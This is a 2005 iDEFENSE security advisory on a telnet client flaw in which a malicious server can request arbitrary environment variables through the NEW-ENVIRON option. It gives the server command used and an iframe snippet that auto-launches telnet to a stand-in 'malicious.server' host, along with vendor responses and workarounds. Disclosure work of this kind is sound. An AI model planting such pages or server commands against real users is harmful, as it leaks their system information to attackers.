Multiple Vendor Telnet Client Information Disclosure Vulnerability iDEFENSE Security Advisory 06.14.05 www.idefense.com/application/poi/display?id=260&type=vulnerabilities June 14, 2005 I. BACKGROUND The TELNET protocol allows virtual network terminals to be connected to over the internet. The initial description of the telnet protocol was given in RFC854 in May 1983. Since then there have been many extra features added including encryption. II. DESCRIPTION Remote exploitation of an input validation error in multiple telnet clients could allow an attacker to gain sensitive information about the victim's system. The vulnerability specifically exists in the handling of the NEW-ENVIRON command. In order to exploit this vulnerability, a malicious server can send a connected client the following telnet command: SB NEW-ENVIRON SEND ENV_USERVAR <name of environment variable> SE Vulnerable telnet clients will send the contents of the reference environment variable, which may contain information useful to an attacker. The expected behavior would be only to send environment variables related directly to the operation of the telnet client (for example, TERM), or those specifically allowed by the user. III. ANALYSIS Successful exploitation of the vulnerability would allow an attacker to read the values of arbitrary environment variables. By itself this vulnerability is not a large threat, but exploiting this vulnerability may give an attacker more information about a targeted system, which could allow more effective attacks. In order to exploit this vulnerability, an attacker would need to convince the user to connect to their malicious server. It may be possible to automatically launch the telnet command from a web page, for example <html><body> <iframe src='telnet://malicious.server/'> </body> On opening this page the telnet client may be launched and attempt to connect to the host 'malicious.server'. IV. DETECTION iDEFENSE has confirmed the existence of the vulnerability in version 5.1.2600.2180 of the Microsoft Telnet Client, the telnet client included in the Kerberos V5 Release 1.3.6 package and the client included in the SUNWtnetc package of Solaris 5.9. It is suspected that most BSD based telnet clients are affected by this vulnerability. The telnet client from the netkit-telnet package distributed with all current versions of Redhat Linux contains a patch for this vulnerability, introduced in early 2000. Some other distributions may also contain this patch. There does not appear to have been a security advisory released at the time the patch was added, nor does there appear to be an entry in the Bugzilla database. This issue appears to have been mentioned in passing in RHSA-2000-028, in relation to a vulnerability in Netscape. V. WORKAROUND For Windows based platforms, disabling the Telnet handler or specifying a different application to handle Telnet URL's can mitigate URL based attacks. This can be accomplished by removing or modifying the following registry key: HKEY_CLASSES_ROOT\telnet\shell\open\command This workaround should prevent automatic exploitation attempts. It does not fix the underlying issue. iDEFENSE is currently unaware of any workarounds for this issue for other affected platforms. VI. VENDOR RESPONSE Vulnerable: - Microsoft Corp. Microsoft has investigated this issue. We have released an update to address this concern. For more information, visit the following Web Site: http://go.microsoft.com/fwlink/?linkid=47016 - MIT Kerberos The MIT Kerberos Development Team believes that the telnet client in our distribution behaves as intended with regards to its handling of the NEW-ENVIRON option. We do not feel that disclosure of user environment variable settings constitutes a significant exposure. We are willing to consider patches which implement an option to restrict or disable the transmission of environment variables by the telnet client. - Sun Microsystems, Inc. Sun Microsystems, Inc. can confirm that Solaris and the SEAM product are affected by this issue. The impact, contributing factors and patch details are available in Sun Alert 57755 for Solaris which is available here: http://sunsolve.sun.com/search/document.do?assetkey=1-26-57755-1 and Sun Alert 57761 for SEAM which is available here: http://sunsolve.sun.com/search/document.do?assetkey=1-26-57761-1 - SUSE LINUX The updates will be released on the coordinated release date. Customers of SUSE LINUX can download the package by using YOU or directly via FTP from our servers. Not Vulnerable: - ALT Linux ALT Linux is not vulnerable to the telnet environment variable disclosure since February of 2002, due to our inclusion of the Red Hat Linux derived patch from Openwall GNU/*/Linux. - CyberSafe Ltd. The TrustBroker Secure Connection Utilities and TrustBroker Secure Connection Services, version 5.6.1 or later, are not effected by this vulnerability. If you are using earlier releases of these products you need to upgrade. - Openwall Project Openwall GNU/*/Linux is not vulnerable to the telnet environment variable disclosure, and it never was due to our inclusion of the Red Hat Linux derived patch in the very first publicly available version of our telnet package (which was in other aspects based off the code found in OpenBSD 3.0). It is, however, worth noting that the unsafe environment variable disclosure was in fact documented in the BSD telnet client manual page. Thus, now that this issue has been revisited, we have reworked the environment variable restrictions patch to have our documentation in sync with the actual behavior. - Ubuntu Ubuntu supports and ships netkit-telnet, which has been patched to not disclose arbitrary environment variables for a long time now. The krb5 version is also available in the archive, however, it is unsupported and there will not be an official advisory for it. It will most likely be fixed by the community. - WRQ, Inc. No versions of the WRQ Reflection for the Web Telnet clients are vulnerable as they return very limited terminal information in response to the NEW_ENVIRONMENT command and use dynamically-sized buffering. Security update and advisory information for WRQ Reflection for the Web can be found at: http://support.wrq.com/techdocs/1704.html No versions of the WRQ Reflection Telnet, TN3270, TN3270E, TN5250 or Kerberized Telnet clients are vulnerable as they are not based on either the BSD or MIT Telnet clients and use Microsoft Windows memory management routines along with compile-time buffer overflow protection. Security update and advisory information for WRQ Reflection products can be found at: http://support.wrq.com/techdocs/1708.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-0488 to this issue. The CVE Project has also assigned CAN-2005-1205 to identify this issue in Microsoft products. A separate CVE number was issued for Microsoft due to the differing code base used. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Additionally, CERT has issued VU#800829 for this vulnerability. VIII. DISCLOSURE TIMELINE 02/18/2005 Initial vendor notification 06/14/2005 Coordinated public disclosure IX. CREDIT Gaël Delalleau is credited with this discovery. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2005 iDEFENSE, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email customerservice@xxxxxxxxxxxx for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
